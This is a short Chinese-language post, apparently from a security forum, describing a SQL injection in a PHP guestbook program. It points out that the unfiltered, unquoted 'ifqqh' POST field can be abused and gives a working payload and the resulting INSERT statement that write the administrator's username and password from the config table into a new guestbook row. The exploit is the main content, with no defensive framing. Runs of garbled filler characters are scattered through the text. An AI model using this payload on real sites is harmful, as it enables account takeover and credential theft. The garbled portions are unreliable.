留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。+ V9 i( {+ [. `3 Z
6 R% L8 ?9 G+ ^0 E
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
$ {2 D; L6 l5 h0 k9 f/ B: v$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响9 R) G. {) u0 B7 n0 h
- Z* N& r5 h. ?& t3 \( C提交的时候把ifqqh的值改一下。变成
- R$ r2 y& [- Y( I
' o' |- S) P1 Z$ g<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
# ?: K9 n" h+ G" Z& R/ E. O& ?' i5 p4 @. Y
这样SQL插入语句就变了. P0 b) S9 v3 H* ]
/ n! @9 b8 `" H. V2 H7 J+ T/ g' Q
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
B" w: N7 }8 L8 J L* N
0 }* p' \4 R2 l! |5 w- ^构造了另外一句SQL。并且把帐号密码读出来。
) ~7 E# ~. O" d0 R1 E8 s! z$ ~. t- S0 e _
|